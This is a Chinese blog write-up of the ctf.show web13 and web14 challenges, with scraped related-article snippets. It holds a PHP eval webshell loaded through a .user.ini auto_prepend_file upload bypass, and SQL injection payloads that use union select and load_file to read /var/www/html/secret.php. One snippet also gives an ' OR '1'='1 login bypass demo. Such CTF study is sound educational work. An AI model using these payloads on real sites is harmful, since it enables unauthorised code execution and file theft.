ctfweb入门(13-14)

最新推荐文章于 2025-04-13 14:19:34 发布
最新推荐文章于 2025-04-13 14:19:34 发布
阅读量818 收藏 1
点赞数 1
文章标签: php 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_62046696/article/details/125267639
版权

ctf.show_web13

进入题目是个文件上传的题目,尝试了一番文件上传漏洞利用的方法后,没有啥突破,可能有啥隐藏的目录,尝试源码泄露利用的方法,在输入upload.php.bak时成功下载下来源码。
.bak文件是备份文件。
这里列举一下常见的源码泄露
.hg源码泄漏 .git源码泄漏 .DS_Store文件泄漏,还有以.phps .bak结尾的网页
在web题没有头绪的时候可以尝试可能会有奇效。
源码如下:

<?php 
	header("content-type:text/html;charset=utf-8");
	$filename = $_FILES['file']['name'];
	$temp_name = $_FILES['file']['tmp_name'];
	$size = $_FILES['file']['size'];
	$error = $_FILES['file']['error'];
	$arr = pathinfo($filename);
	$ext_suffix = $arr['extension'];
	if ($size > 24){
		die("error file zise");
	}
	if (strlen($filename)>9){
		die("error file name");
	}
	if(strlen($ext_suffix)>3){
		die("error suffix");
	}
	if(preg_match("/php/i",$ext_suffix)){
		die("error suffix");
    }
    if(preg_match("/php/i"),$filename)){
        die("error file name");
    }
	if (move_uploaded_file($temp_name, './'.$filename)){
		echo "文件上传成功!";
	}else{
		echo "文件上传失败!";
	}

 ?>

文件的大小要小于等于24,名字长度小于等于9,后缀长度小于等于3,并且最要命的是后缀和名字都不能包含php。我们肯定是要上传一句话木马的,既然小于等于24可以这样写<?php eval($_POST['a']);正好24字节可以满足,但是由于后缀问题服务器无法解析该php语句。这里用一种特殊的手法来绕过。
1.我们先将一句话保存为1.txt。
2.上传1.txt
3上传.user.ini文件。
对于php中的.user.ini有如下解释:
PHP 会在每个目录下搜寻的文件名;如果设定为空字符串则 PHP 不会搜寻。也就是在.user.ini中如果设置了文件名,那么任意一个页面都会将该文件中的内容包含进去。
我们在.user.ini中输入auto_prepend_file =a.txt,这样在该目录下的所有文件都会包含a.txt的内容、

 那就直接构造参数吧,这里用post发送,我get试过了,不行,

查看当前目录有哪些文件:a=print_r(glob("*"));

a=highlight_file("903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php");


information_schema.`tables`一个过滤手段information_schema.`columns`,同理

apache的默认网站根路径是 /var/www/html, 我们试一下读这个文件的内容

load_file('/var/www/html/secret.php'),加载文本文件读取信息。

web14

<?php
include("secret.php");

if(isset($_GET['c'])){
    $c = intval($_GET['c']);
    sleep($c);
    switch ($c) {
        case 1:
            echo '$url';
            break;
        case 2:
            echo '@A@';
            break;
        case 555555:
            echo $url;
        case 44444:
            echo "@A@";
            break;
        case 3333:
            echo $url;
            break;
        case 222:
            echo '@A@';
            break;
        case 222:
            echo '@A@';
            break;
        case 3333:
            echo $url;
            break;
        case 44444:
            echo '@A@';
        case 555555:
            echo $url;
            break;
        case 3:
            echo '@A@';
        case 6000000:
            echo "$url";
        case 1:
            echo '@A@';
            break;
    }
}

highlight_file(__FILE__)

打开界面发现switch函数,遇到break才会停止,又因为有sleep所以时间应该小一点,直接?c=3

 访问

 感觉是一个注入漏洞,然后输入true  false返回值不一样,说明是数值型漏洞

CTFshow web14_Je3Z的博客-优快云博客

到这我们发现数据库中并没有我们想要的flag,但是有一条提示tell you a secret,secert has a secret…. 所以很有可能flag在secret.php中,然后mysql提供了读取本地文件的函数load_file(),但是要权限,用user()看一下权限是root可以用load_file()读
 

?query=-1/**/union/**/select/**/load_file('/var/www/html/secret.php')

从这可以看出过滤的名字,然后query需要用get方法赋值

 

?query=-1/**/union/**/select/**/load_file('/real_flag_is_here')

就可以得出flag

ctfshow-WEB-web14( 利用数据库读写功能读取网站敏感文件)_ctfshow web14
2501_90250988的博客
01-17 373
switch循环有一个特点, 如果 case条件对应的代码体中没有 break或者其他循环控制的关键字, 则会继续执行下一个 case条件的代码, 这里我们传递 3, echo ‘@A@’ 以后, 会继续执行 case 6000000 对应的 echo “$url”先访问一下 secret.php 文件, 可以正常访问, 没有报404, 说明这个文件确实存在, 而且就在根目录下, apache的默认网站根路径是 /var/www/html, 我们试一下读这个文件的内容。获取当前使用的数据库。
ctfshow web入门 web14
weixin_59560134的博客
05-11 1075
根据题目提示查看源代码,发现编辑器路径 在url中输入/editor得到 点击文件上传发现文件空间可能有内容 /editor/attached/file/var/www/html/nothinghere/fl000g.txt 访问 /fl000g.txt拿到flag ctfshow{8be17f6c-7a13-419b-ada0-f5f1549b3ede} ...
ctfshow-萌新-web14( 曲线救国-POST请求绕过获取网站敏感信息)
热门推荐
wangyuxiang946的博客
09-12 1万+
ctf.show萌新模块 web14关, 此关卡是一个代码执行漏洞, 重点在于命令执行函数的利用方式, 源码中过滤比较严格, 尤其是过滤了分号;之后, 虽然可以用?>来代替分号, 但这样一来就只能执行一行代码, 难度较大, 需要注意的是, 源码中的过滤只针对GET请求的参数, 而未对POST请求的参数做限制, 这里推荐曲线救国,GET请求传递一句话木马, 然后在POST请求中传递参数执行系统命令, 从而获取 flag 来到页面后展示了部分源码, 并提示 flag 就在 config....
ctfshow WEB web14
最新发布
weixin_68416970的博客
04-13 776
ctfshow WEB web14
ctfshow web14
m0_55923820的博客
07-16 1413
ctfshow web 14 解析 这道题比较简单,分值也只有5分,就是一个简单的sql注入。但是这个sql注入的回显你得看它的源代码里才有。但是它把你右击查看源码那个玩意儿给禁了。你需要在你的url前面加view-source:才能看到源码
CTF.show:web14
qq_46230755的博客
01-16 436
打开来后执行语句得到提示 ?c=3 当c为3时,不会退出循环,进而执行下一个case语句得到url here_1s_your_f1ag.php 进入之后发现是一道注入题目 查看源代码发现存在提示 if(preg_match('/information_schema\.tables|information_schema\.columns|linestring| |polygon/is', $_GET['query'])){ die('@A@'); 老样子先爆库名 /here_1s_your_f1ag.
CTF-WEB入门DOC-2019版1
08-03
【CTF-WEB入门DOC-2019版1】主要涵盖了CTF竞赛与Web安全相关的基础知识和进阶技能,适合对网络安全有兴趣,尤其是希望在Web安全领域发展的人群。以下将详细介绍其中的关键知识点: 一、CTF简介及目标: CTF...
ctf_show笔记篇(web入门---文件上传)
whale_waves的博客
03-06 1014
这里利用.user.ini文件,只要访问同目录下的php文件就能把目标png文件当作php文件加载。可以直接写payload获得flag,不用在继续$_POST之类的。自行搜索绕过一下其他的和153题无异。这里就关系到了网站中间件的设置问题。使用GIF89a在文件最上方添加。但是会验证图片头信息。
007-CTF web题型总结-第七课 CTF WEB实战练习().pdf
07-09
007-CTF Web题型总结的第七课主要涵盖了三个部分:入门第一部分、入门第二部分-社工篇和入门第三部分-高级篇。这些部分详细介绍了在CTF(Capture The Flag)网络安全竞赛中常见的Web挑战类型,并通过Bugku平台上的...
006-CTF web题型总结-第六课 CTF WEB实战练习() .pdf
07-09
本篇内容主要针对CTF Web实战练习进行了总结,分为入门的第一部分和第二部分,涵盖了多个不同类型的题目,旨在帮助学习者提升Web安全攻防能力。 **入门第一部分** 1. **bugku-ctf 第一题:成绩单** 这个题目可能...
ctf_show笔记篇(web入门---SSRF)
whale_waves的博客
04-04 1326
ssrf产生原理: 服务端存在网络请求功能/函数,例如:file_get_contens()这一类类似于curl 这种函数传入的参数用户是可控的 没有对用户输入做过滤导致的ssrf漏洞 ssrf利用: 用于探测内网服务以及端口 探针存活主机以及开放服务 探针是否存在redis服务(未授权访问, 相当于是可以访问到redis服务并且开发人员不严谨没有设置密码, 因为默认是没有密码的, 或者说开发者设置了密码但是是弱口令), 利用定时任务反弹shell
CTFshow web14
Je3Z的博客
04-18 844
<?php include("secret.php"); if(isset($_GET['c'])){ $c = intval($_GET['c']); sleep($c); switch ($c) { case 1: echo '$url'; break; case 2: echo '@A@'; break; case 555555
ctfshow-WEB-web14( 利用数据库读写功能读取网站敏感文件)
wangyuxiang946的博客
09-07 1万+
ctf.show WEB模块第14关是一个SQL注入漏洞, 绕过switch循环后可以拿到一个登录界面, 登录界面存在SQL注入, 脱库以后会提示flag在另一个文件中, 利用数据库的文件读写功能读取文件内容即可拿到flag 开局是一个switch循环, 需要传递参数 c, 参数对应的执行结果有四种: '$url', '@A@', $url, "$url" ; 前两个是字符串, 没啥用, 作者的目的应该是想让我们输出后两个 $url 的其中一个, 但输出之前还有个sleep(), 选的不合适..
CTFshow-web-web14
qq_68581192的博客
11-03 322
发现是get传参,变量是c,c的值进入sleep函数等待,c值越大,等待时间越长。进入switch语句判断,所有的case判断完成后break退出,只有到case 3时,继续到case 6000000,然后echo一个$url,如果我们想看c=6000000的值,就要先构造c=3。访问secret.php文件,虽然没有内容,但是没显示报错,说明文件存在,但是读取方法不对,apache的默认网站根路径是 /var/www/html, 我们试一下读这个文件的内容。利用数据库的文件读写功能读取文件内容。
ctfshow-web入门-信息搜集(14
2301_80281749的博客
10-20 380
2.我们直接在url后面添加/editor,在flash上传空间里面找到文件空间,爆出了一堆目录。
ctfshow-web14
HAI_WD的博客
08-26 743
查看一下,发现完整的请求是http://c7ff9ed6-dccd-4d01-907a-f1c61c016c15.challenge.ctf.show/here_1s_your_f1ag.php?首先先测试注入,发现是数字型的,并且空格被处理了,所以直接绕过就行。并且这里看到这里处理的内容就是不让你去读表,类似于这种题目,要嘛就是让你从数据库里找,要嘛就是从文件里找。在index.php中包含了一个secret.php,先读这个文件试试,这里有一个小知识,apache的默认路径是。这道题就是,从文件里找。
CTFSHOW系列-web14(信息收集-editor漏洞)
SuperherRo的博客
11-28 827
CTFSHOW系列解题思路
刷题之旅第34站,CTFshow web14
cc菜的一批
02-17 2392
感谢ctf show平台提供题目 提交命令,得到了php文件。 ?c=3 我们打开这个php文件看看,是个查询界面。 通过测试,我们发现 information_schema.columns,information_schema.tables均被过滤了,那么可能flag并不是在数据库中。 我们使用sql 的 load_file 命令,进行读文件。在前面我们看到了有个secret.php文件。...
CTFshowweb14
zhong_yan的博客
10-26 387
如图: 信息提示:源码里面就能不经意间泄露重要(editor)的信息 所以我们查看源码 题目说是要查看编辑器 我们搜索一下 果然有,我们来访问一下 是这个界面啊。 我们点击文件上传 我们访问这个浏览器目录啊 直接访问会产生错误,因为这个路径是一个绝对路径 因此,我们可以访问nothinghere/fl000g.txt 即可得到flag ...
ctf web入门21
03-17
### 关于CTF Web入门教程 对于希望进入CTF领域并专注于Web安全方向的学习者来说,可以从多个平台获取资源和支持。例如,PicoCTF 平台不仅为初学者提供了详尽的教程和指导文档,还包括了针对不同难度级别的挑战题[^1]。这些题目覆盖了从简单的HTML、JavaScript到更复杂的SQL注入、跨站脚本攻击(XSS)等内容。 另外,《目录 第一章、基础知识篇》提到的基础知识部分也非常重要,尤其是其中涉及的Web安全基础章节[^2]。这部分内容通常会讲解HTTP协议的工作原理、常见的Web漏洞及其利用方式,以及如何防御这些问题的发生。 至于具体的实践机会,则可以通过参加像BugKu CTF这样的在线竞赛来获得。该平台上提供的`inspect-me`, `my-first-sqli`, 和 `post-the-get`等题目都是非常好的起点[^3]。它们设计简单明了,旨在帮助新手理解特定技术的概念并通过实际操作加深印象。 以下是几个适合初学者尝试的经典CTF Web类别的例子: #### 经典CTF Web题目实例 ```html <!-- Example of a basic XSS challenge --> <form action="/vulnerable_page" method="POST"> Comment: <input type="text" name="comment"/> </form> ``` 上述代码片段展示了一个可能存在反射型XSS漏洞的表单输入框。参赛选手的任务就是找出能够成功执行恶意脚本的方法。 --- #### Python模拟SQL Injection环境的小程序 ```python import sqlite3 def login(username, password): conn = sqlite3.connect(":memory:") cursor = conn.cursor() # 创建测试数据库结构 cursor.execute("CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT NOT NULL UNIQUE, password TEXT NOT NULL);") cursor.executemany("INSERT INTO users VALUES (?, ?, ?)", [(None,"admin","password"),(None,"testuser", "securepass")]) conn.commit() query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}';" result = cursor.execute(query).fetchall() if len(result)>0: return True else: return False print(login('admin',"' OR '1'='1")) # 正确绕过验证逻辑 ``` 此Python脚本创建了一个内存中的SQLite数据库用于演示目的,并故意留下了可被利用的安全隐患——即未对用户提交的数据做适当转义处理从而允许发生SQL注入行为。 --- ### 总结 通过理论学习与动手实验相结合的方式,可以有效提升个人解决CTF比赛中遇到的各种复杂问题的能力。推荐按照以下顺序推进自己的学习进程:熟悉操作系统(Linux),掌握网络通信机制(HTTP/HTTPS),深入研究编程语言特性(Python/PHP/Javascript),最后再专攻某一具体方向如渗透测试或者二进制分析等领域内的高级主题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值